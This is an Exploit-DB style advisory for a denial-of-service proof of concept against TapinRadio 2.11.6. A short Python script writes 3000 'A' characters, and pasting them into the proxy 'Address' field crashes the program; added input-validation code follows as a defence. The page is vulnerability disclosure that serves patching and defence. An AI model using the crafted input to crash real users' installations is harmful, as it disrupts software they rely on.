Vendor: TapinRadio
By: Victor Mondragón
CVSS: 7.8 (HIGH)
Denial of Service
CWE: N/A
Product Name: TapinRadio
Affected Version From: 2.11.6
Affected Version To: 2.11.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

TapinRadio 2.11.6 – ‘Address’ Denial of Service (PoC)

TapinRadio 2.11.6 is vulnerable to a denial of service when a maliciously crafted value is supplied in the 'Address' field of the application proxy settings. To reproduce the crash: run the Python code to generate the crafted 'Address' value and copy its content to the clipboard; open TapinRadio and select 'Settings' > 'Preferences' > 'Miscellaneous'; select 'Set Application Proxy...' and paste the clipboard into the 'Address' field; type '444' in the 'Port' field, 'test' in the 'Username' field and '1234' in the 'Password' field; then select 'OK' and 'OK'. The application crashes.

Mitigation:

N/A
Source

Exploit-DB raw data:

#Exploit Title: TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-21
#Vendor Homepage: http://www.raimersoft.com/
#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
#Tested Version: 2.11.6
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..." In "Address" field paste Clipboard
#6.- In Port type "444" > "Username" type "test" > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

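# Crafted 'Address' value: 3000 "A" (0x41) characters
cod = "\x41" * 3000

# Write the value to tapin_add.txt (opened and copied in step 2)
with open('tapin_add.txt', 'w') as f:
    f.write(cod)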
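
The advisory does not state the root cause or list a fix. As an added example (not Exploit-DB or vendor code), this is the kind of input check a proxy settings dialog can apply before the 'Address', 'Port', 'Username' and 'Password' values reach any parsing or storage code. The function names and the length limits (253-character DNS names, 255-character credentials) are assumptions.

```python
import ipaddress
import re

# Assumed limits (not from the advisory): DNS names are at most 253 characters
# with labels of at most 63; credentials are capped at 255 as in RFC 1929.
MAX_HOST_LEN = 253
MAX_CRED_LEN = 255
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def valid_host(address):
    """Accept an IP literal or a DNS hostname; reject anything else."""
    if not address or len(address) > MAX_HOST_LEN:
        return False
    try:
        ipaddress.ip_address(address)
        return True
    except ValueError:
        pass
    labels = address.rstrip(".").split(".")
    return all(_LABEL.fullmatch(label) for label in labels)


def validate_proxy_settings(address, port, username="", password=""):
    """Return a list of error strings; an empty list means the input passed."""
    errors = []
    if not valid_host(address):
        errors.append("address: not an IP or hostname of at most %d chars" % MAX_HOST_LEN)
    if not (port.isascii() and port.isdigit() and len(port) <= 5
            and 1 <= int(port) <= 65535):
        errors.append("port: must be an integer from 1 to 65535")
    for name, value in (("username", username), ("password", password)):
        if len(value) > MAX_CRED_LEN:
            errors.append("%s: longer than %d chars" % (name, MAX_CRED_LEN))
    return errors


if __name__ == "__main__":
    # Constructed inputs: the PoC's 3000-character value and a normal proxy entry.
    print(validate_proxy_settings("A" * 3000, "444", "test", "1234"))
    print(validate_proxy_settings("proxy.example.com", "444", "test", "1234"))
```

Rejecting the value at the dialog boundary keeps the oversized string away from whatever code path crashes; it does not replace fixing that code path.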